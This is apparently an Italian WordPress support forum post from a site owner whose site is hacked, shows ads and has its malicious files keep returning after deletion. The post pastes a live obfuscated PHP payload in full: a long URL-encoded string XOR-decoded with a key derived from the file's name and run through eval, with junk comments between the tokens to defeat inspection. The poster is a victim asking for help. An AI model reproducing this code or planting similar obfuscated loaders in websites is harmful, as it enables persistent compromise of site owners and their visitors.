$_173ysgu = basename/*z*/(/*3*/trim/*962*/(/*mapq*/preg_replace/*m*/(/*wuc*/rawurldecode/*gz93j*/(/*m0t*/"%2F%5C%28.%2A%24%2F"/*n4*/)/*90ys*/, '', __FILE__/*wj*/)/*o9pk*//*j*/)/*mxb*//*x6rt*/)/*kdnv*/;$_ywhrmgi = "GUBLE%06%07TP%40%0C%07G%09%40%16%16%01%03%0FmZA%07%17%0AVG%3D%07%16%07%03F%5C%0ENJF%24Hh%00%01%04%0B%5C%5C%06N%10%1B%5CV%03%09%3B%01%0D%5CMK%11%170MA%07%05%10%07B%15%15%0EXJT%24s%0B%0A%0D%3D%11WM%06N%06%1D%5C%5C%10%3B%08%0D%05%15%15%0E%276%23b%1AY%24%0D%0C%0BmJK%1DKHB%5C%05%3B%01%10%10%5DK%5DNOO%1E%1AY%24%0D%0C%0BmJK%1DKHCR%1A%3B%01%1A%07QLZ%00%0C%01qG%0B%09%01EN%12%09%07R%23%0A%5CA%0D%16%3B%10%07BV%5C%1D%0A%01I%1BRM_%22%11WMq%1D%0A%02Kl%0E%0D%09%0B%16%1A%09%07R%0A%09%06%12%06%01%02%0B%0CW%5D%06K3%27~l%27%2B%28%40K%1BBJ%0C%05%06%40VJF4%2A2m%7Ca%25AC%0E%11%3E%0AFKYOPHIKNJV%04%0D%0A%07%06%1A%1EH%00%0F%0AqC%17%10%3B%01%0D%5CMK%07%17%1C%0E%14KM%1F%06%07TP%40%0CKHHZ%0E%01%3B%12%17FfM%06%0D%1BK%5D%16%17DEN%12%08%07RG%1AYP%09%16%14B_%12%1EH%0C%5B%5B%1E%02%07WIV%00%06%0D%03%5D%02VK%1E%5BT%00PO%00%0BMPT%5DL%07%07%07%5D%07E%09%5EB%06%01%0EB%13F%11%13%01%09%40I%15%0F%16%01MG%0B%0B%0AB%05VAO%02%0C%0C%06%17%17%09%13%13%04%5EC%07I%18%06H%13J%17%10%10%0EWW%06M%16%02YB%04%08%1EKB%0E%19%1A%40%18%1DKG%17%16%0AB%40%10%02SM%0C%00ZI%01%00%10%09%03_TE%11CR%0E%11%23%26%27%26%27t~f%20%29%24b~%2C%2B430am%7B%3F47wi%03%06%07%06%07T%5EF%00%09%04B%5E%0C%0B%14%13%10AM%5B%1F%14%17WIRUVQV%07%0F%19QZD%01%0E%40_%40%1A%0CJTK%05%0AO%13%13%11%10%16%3D%11BUG%1DKKA%5C%16%1E%07%06%16YXC%04%08%17%07%08F%1C%0A%1A%0FWUGI%5EOOA%10%05%1D%3D%04%5EP%5EAG%17%40K%0F%01%08%0BK%09%1D%5E%0B%0F%0C%5DG%0C%03D_B%02%02%0A%18%16%03YG%00DYB%40%10%02%0A%1C%0E%18_U%0E%1ED_BBKK%0E%3C%1DKC%0E%05%07%07J%10Gu7%22BtRO%1ETO%5Bn%12rF%3FRsM%40HD%40%40%1E%19%0A%1C%0E%18_U%0E%1EMY%06%5D%19UM%0C%00ZI%01%00%10%1B%16%40UW%0E%0AO%13%13F%1C%0A%1A%0FWUG2G%1ACD%13%02%08%189%16IL%05%00%1CZ%5D%05OO%3F%3F%09%1DI%18%19%00I_BYDF%1A%5CAC%0C%0F%06u%17%17%09%13%13%04%5ECuM%13%0DBP%11%10%0A%05I%19dsRG%07WD%09%1E%13%01%18%12%04%0EM%1B%01V%5E%07%08%0D9FGTY%18%05%03ThF%14%06%0E%01AM%40%0EHDsnY%40%01%0D%0DKTF%0FCR%0E%17%1A%0A%1C%0F%07%5EPuM%16%02YB%04%08%1E9FB%5BB%0A%10%1B%40TIO9%3FY%16%5BV%18%0A%19%5BZ%01DYBJ%16VA%1D%19%0CJG%1B%10%16%0E%1BUP%0EU_O%1C%1AB%18DJFUHT%06%04%03%0E%0D%5CDPKY%16NM%1D%0C%09%5CP%0BDYBJ%1A%1DI%18%19%00I_BBDSW%1B%19%12UC%5B%07%13%1EDLF%0AKNE%13%14%0CT%13%5CZDPK%09%1D%5E%03%10%17YGBYDJJ%16QW%1E%08%15YP%18DBBQ%1B%19%12UCY%07%13%1ED%40%07%0D%5D%40C%01%05T%0AB%17%08%13%16%00%12%04%0EM%12%1ABD%16%06DLBQQ%5CAG%0DVB%0B%12%11%0B%01%1B%02G%0FCG%0A%5B%1B%13%0F%18%15QC%0EH%5EO%18%07KD%1FF%13GUY%1D%01O%13%13F%15%11%0E%15F%5B%0EGC%0CFAJ%40%13%01%16%5D_%5C%0A%0AF%15N%0B%02DJFWVA%10%0E%07H%13CYDTV%1B%19UM%12%1ABD%16%06D_B%16H%5B%05%14%1BL%13LD%07%0A%10%1A%1D%5E%03%10%17YGK_%19%1FBEQG%05%06O%06%17%12%06%08%01%11FWII_O%5DG%10%08%01%0CJ%16LC%1E%12%09BIKM_%10%07FL%5C%07CK_F%0E%13%10%00YOPHIKNHF%0C%07%10%0B%0D%5CfK%11%0A%1CZ%40JC%02%0B%0EWf%5E%1C%170M%5C%0C%10%01%0C%16A%1E%07%40%18%09%5B%5D%01%10%0D%0D%0C%12_G%05%060%5EF%16%3B%07%0D%0CF%5C%40%1D%10G%0A%5E%07%0D%13%17%07Y%15%0EM%06%03J%40%0F%07%16%05N%12%1DK%05%07%1CCP%10%03%17%09%12HOJI%5EOhR%0E%17%01K%19%16JC%0C%0D%18VW%0FDYBFWUJ%1A%0E%0C%5CT%11%0F%14%18%14V%19%13TCW%0E%0CBC%05EB%08%19%09%1EDT%0A%5C%0D%10%1E%01%06F%19%13I%23%09AC%07%0ALF%0FWPY%1C%06%04%02%13F%17%09%07%0CEAJ%04JTGUBL%40%0D%0DFCM%0D%17O%13%0E_D%22%03%0EA%5C%07%12%11%0AZF%10%0ADRYO%5CB%1A%06%14GUBL%0D%11%3DSK%5C%08%1AG%0AV%0E%00%17%0F%01%40%5E%07%40CKK_%06%17%09%01%10U%19%13I%0A%02%5E_%0D%00%01JFWUJ%1A%0E%0C%5CTK_%40%0F%1A%5ETD%0FCR%0EU%15%16%0D%16%07%1A%1DA%06%17%15MW%16HDF%07%5E%5D%5D%04%00%1DI%1AY%02%07%0E%0DA%5C%06M%0C%00ZI%01%00%10KY%40%5CZ%1C%11%01%0E%17%0F%1C%08%0F%08T%02S%14%1E%06H%13JE%02%17%0CQMG%06%0D0KK%0B%17%10%11J%15_G%05%060IV%16%3B%07%0D%0CF%5C%40%1D%10H%07%1A%19%02%11%0C%01FPA%07C%09G_%07%3B%03%07%16mZA%07%17%0A%40G%11L%40%07%0EVJC%0A%11%08BQ%0E%16%15%0FKI%1DC%1D%11%0DYJ%17%00D_BTV%5E%0C%0DG%0AV%0E%00%17%0F%01%40%5EB%0B%0F%1D_%5ENDF%10%40%1B%02%0A%02%08%0D%5BG%08%0A%17B_%12_%5C%0C%02%0B%06%17%0F%10%16%00%15KLJEC%09G_%07%17%0D%18%07%1A%1DK%05%07%1CCP%10%03%08%00%0E%40HC%40JTHP%0E%0B%17%07J%16TZ%1B%01%18WF%06M_%10%07FL%5C%07CKEX%00%11%10%08%0CA%02S%14%05%1A%40P%16%0D%0B%0CBVM%5C%0C%08%02%06%1A%19%16%01%16%17%40W%0E%1D%11%06C%1B%12%16%01%05%3D%40%5C%5E%05%02%0CK%1B%40K8JL%18e%0AFAC%0E%14EHD%3D%3Dtpb%2C%3C0%07%1AY%19%02%17%0CQMG%06%0DOOQ%17%0F%16%17%0BY%11%0A%1D%15%0BYI%0CHDF%0D%5DMT%0A%07%1BX%40%01%0C%17%16KI%1DV%01%13%0BWD%00%01D_B%10%1B%15%0F%0C%1D%0E%1BF%14%06%0E%01AM%40%0E%5E_%15%13F%14%06%0E%01AM%40%0E_%1CZA%0E%01%0AJFFOJ%1E%19%01%07%08K%1F%02%0D%10%12%11%0A%18%11%17VG%16YTYB%16H%5C%11%1B%1BZ%0F%11%10%16%0E%07%5C%11%0A%06%0C%1BTP%06%10%12%11%01ZJZ%40CI%08%13F%14%06%0E%01AM%40%0E_%1CZA%0E%01%0AJFFOJ%1E%19%01%07%08B%40%15%10%1AJMZBHC%0E%17%12%06%08%01%11FWIBHFU%17%1A%0C%14%06%1BE%5BKIMR%0EP%0A%16L%0D%10V%11%0A%1D%15%0BYI%0C%3F%40%12%00%5EZ%5D%1D%0D%08s%1AB%3AD%0D%10V%11%0A%06%0C%1BTP%06%10%12%11%01ZJZ2G%1E%5CK%1A%10%10%3FK%1B%02S%14%11%0AZF%10%0ADF%1AZIJ%10%14%0DK%08%1F%02%11%0C%01FPA%07C%09%5EW%0D%11%12%0FJ%16MX%0D%14%15%40%1FB%40%0B%0D%16HZJ%1D%15%1CM%5B%11%10M%19%05%5EVL%08%0FO%0AF%15%07%0F%10%12%09KK%1D%16%1D%40%13%03%06%11%09%10GPEA%02%0D%5BX%10%11%0D%09J%16MX%0D%14%15%40%1FB%40%0B%0D%16HZJ%1D%15%1CM%5B%11%10MNB%16LY%0A%08%1D%5E%1AY%19%02%17%0CQMG%06%0DO%40%5E%0C%06%0A%14%0C%5B%11%0A%1D%15%0BYI%0CHDF%0D%5DMT%0A%07%1BX%40%01%0C%17%16KI%5EB%06%01%0EB%13F%11%13%01%09%40I%15%1B%06%1B%5BA%0CD%05%00%17YK%5B%00%08GOQ%17%0F%16%17%0BY%11%0A%1D%15%0BYI%0CHDF%17EZE%1B%13F%02%13F%0B%0B%16%18Q%5DZ%1F%10%0CF%40%16M_%1F%04GWM%1D%0A%00%40%13%15%0C%08%0E%00AI%06%40%18KTK%06%09%15%09%04B%19%13I%23%09G_%07%3B%03%07%16mZA%07%17%0A%40G%11L%00%16%10WRCAJF%15%17%0E%0F%1C%13%1AG%19%13I%10%1B%5CC%0D%17LF%18J%5DC%18%08%09%5E%1FB%09%00WJVM%5C%0C%08%02%06%1AKM_%0B%04%12%11%0A%05%08%17_K%17DE__%12%7Fo%250%2A%07HF%14%0E%15%08BM%0ETC%1C%5BQ%11%10%16JFHAJ%04%12%04HCND%40%0E%09JHV%1CCD%0E%00PM_F%18%5BKM%05%16O%13%13%22%11%0A%11%07%40PO%05%0A%15K%1B%04%14%00%0D%17DT%06%1B%02%18%5BA%0E%00%01%01%0DV%5C%06M%13%05YY%12%10MNB_%5D%1BA%07%1B%5CV%09%09LKK%1B%10%15%14%06%03%5DV%19%40%1E%0B%10QU%5BI%5EOoA%10%05%1DJK%09D%5C%0C%17%1A%5C%5DB%40%1E%0B%10QU%5BR%1E%09%5B%5D%01%10%0D%0D%0C%12%5D%5C%11%0E%07I%5CJ%40%1E%0B%10QU%5B%40%18KKT%0F%03%08%08%0CU%19%13I%11%0EYF%10%08%01%0C%01%5D%5DKA%0D%02%40Q%0C%12%0A%0BJrJK%1B%0A%0EBZ%18%01LF%18%5BKM%05%16F%02%13%0F%00QJ%06FKK%02%0EG%07%1AKM_F%18J%5DC%18%08%09%5E%13_D%24%04%0B%5E%5Cq%0E%06%1BqP%0D%0A%10%07%0CFJ%06%0D%17%1DKX%0FLMKY%16UE%11%12%17%5B%13_D%17%16%10BV%5DAG%15VW%0F%15%0F%04%12%1E%19C%0DVGJG%10%01%0F%0FJ%1B%10%07R%0A%09%0E%1BF%08%0F%1A%13JL%0EH%5ER%0Eu%23%287%27KI%1D_%07%19%01VA%0B%02D_BALL%1A%17%1D%06%17%18%1C%00%0F%13Y_%5EECKBX%1A%15%1C%17B%19%19%1D%5BJT%0AI%1A%00%09%13%09TI%0ETC%1CZA%3D%16%01%12%0ESZKAG%1E%40I%0C%1C%16%0B%04%1E%19%0A%0C%04%02I_%08%0A%03NB%16CV%0D%0E%1EEU%12M_%1F%07%5EJK%12G%15VW%0F%15%0F%04%12%12%04%0EM%19%17J%5E%13%0F%02%12B%1C%19%0C5%0D3%40%1CMFDLB_%5D%1BA%07%1B%5CV%09%09LKK%12%17%0EM%06%08CT%0E%0E%0A%05YOyH%00%0F%0AqC%17%10%3B%01%0D%5CMK%07%17%1C%06W%16%16%01%09%0F%1A%10%02IG%15VW%0F%15%0F%04%12%1B%02S%0F%16%01MG%0B%0B%0AB%0A_XY%1A%17%0E%06%17%01%11%17%16%03F%5D%02IG%1EE%40%00%10%01%01KI%1DT%00%11%0CBFBYD%15%0A%5EUL%1A%13G%07%08F%1E%0D%10%01%5ELuM%00%1A%5DG%03%10%00%3FB%0F%19I%0D%1B%0EE%5C%01L%40%13%09A%5BZ%0C%00F%15W%10%1C%09%0A%05%5D%11%0A%13%0A%1DM_%17M_%1F%04GWM%1D%0A%00%40%13%17%0A%1D%15%01W%11%0A%0A%16%1CZR%16%00M%19FHP%5C%0A%0F%1A%0E%0EB%13%0C%0E%0EPJ%5EAJT%5B%5D%11%01%10JFHP%5C%0A%0F%1Au%17%01%11%17%16%03F%5Ds%40X%0B%5CK%0F%0C%03%0DJ%16CG%1B%00%03%5B%1AY%19%02%17%0CQMG%06%0DO%40F%0B%1E%12%13%07A%11%0A%0A%16%1CZR%16%00Y%2C7~u%07%12%05%00%5CV%03%07%0CBJEQB%05%01%1C%5E%1BKD%05%11B%16VA%1D%19%0CJG%01%01%0A%16%09%0F%07%0A%0B%12%1B%5EI%0E%08%12K%19%5B_%0EAG%0C%5B%40%16%05%10%06KIPHIK%1CZA%01%09%14JFQL%5D%1D%02%1BJ%1FB%40%0B%0D%16HZJ%1D%00%0A%40G%09MD__%12%09%07%12%06%19O_J%40%06%13%16BCB%05%15F%15Q%10%01%05%09YODK%05%10%0AUV%14%05%08JFPHZ%19%19%03BEK_%19%1F%1FTV%5C%0C%02%0CF%13J%05%16%10%03KfC%0C%11%08K%1BF%3B%27--ypkECKqc-70KBSJ%0EM%01%1FHV%10%12%0FB_%0C%19%0A%1D%15%0BYI%0CM%1FF%16D%5DY%13%0DO%13%13%22%11%0A%11%07%40PO%05%0A%15K%1B%04%14%00%0D%17DT%06%0E%07%17OX%0D%07LF%16D%5DY%13%0DF%02%13F%06%14%04%07%40OE%40JTGUBL%0D%11%11WM%06M%17%19JD%18%0A%3FE%03Y%1Es%40CI%08%13F%11%13%01%09%40I%13TG%1BXW%15%1E%0A9ESR%094J%14GUBL%40%16%14VNT%078HO%14%3FDY_B%15P%09%40%18K%5EQ%0E%07%17%16%0CU%19%13I%22%1D%5CR%1BLC%12%14%15%19%13WC%2F%5E%5B%12%12%01%10%11%5BV%40AJC%09%40%14CD_%5C%12%1E%1CGSB%1F%14NC%05%09E%12%04%10IG%1BXW%15%1E%0A9ESR%094OF%15V%01%0C%0BB%22A%5C%5C%00%02%03GI%07L%40%12%00%5EZ%5D%1D%0D%08%07%08%07%1C%0D%16YO%5CB%1A%06%06H%13J%40%10%14%06EC%402D%0E%09nBYYBEW%1E%07%12%06%19O_J%40%10%14%06EC%402D%0B%09nK_%19%07%0EA%5CG%0FCG%0AG%14%00%13%18%0Ci%1EON%3EO%13%0EBC%14%0E%17UP%40NJ%14GUJ%40%10%14%06EC%402D%1CO%14%3FDY_B%15XJ%0DDFU%5B%0F%05%13%11%16S%11%0A%1D%15%0BYI%0C%3FC%12Eo%15%0EM%17%19JD%18%0A%3FE%06%15d%07R%1E%0AB%40%07%0D%02JFFOJ%1E%19%01u%14%11%05C%3FB%0F%04%0EN%11%0AC%14K%1F%11%0C%1BEZKAG%1BXW%15%1E%0A9EB%1Es%40X%12SV%01%0C%0BBFFOJ%1E%19%01u%14%03%0FC%3FYWAG%1DKF%15N%1F%0A%11%0B%18DHK%1AKF%15Nh%19";eval/*jty*/(/*5*//*cw6d*/(/*1dxia*/rawurldecode/*6*/(/*hl*/$_ywhrmgi/*2lr*/)/*n*/ ^ substr/*n9*/(/*y*/str_repeat/*jd1u*/(/*m4b2*/$_173ysgu, /*mck*/(/*g6n82*/strlen/*y*/(/*x*/$_ywhrmgi/*wzxty*/)/*6*//strlen/*y2l*/(/*lq*/$_173ysgu/*ejuq*/)/*g*//*ouldi*/)/*imfk*/ + 1/*pvtuh*/)/*5qpof*/, 0, strlen/*nu647*/(/*0iu*/$_ywhrmgi/*f5d*/)/*4i*//*7t*/)/*c35v*//*0im*/)/*95cm*//*ei*/)/*91rf*/;
insomma quando apro il sito, vengono mostrate pubblicità e ovviamente non compare più il sito, ovviamente ho già provveduto a cancellare i file, modificare i file etc, ma puntualmente ogni tot tempo, tipo ogni 2 giorni massimo, questi ricompaiono.
Ho cancellato e disabilitato temi e plugin, ma niente è cambiato.
Ovviamente ho il sito aggiornato.Cosa posso fare?
GrazieSito violato, file modificati, cartelle create
- Il topic ‘Sito violato, file modificati, cartelle create’ è chiuso a nuove risposte.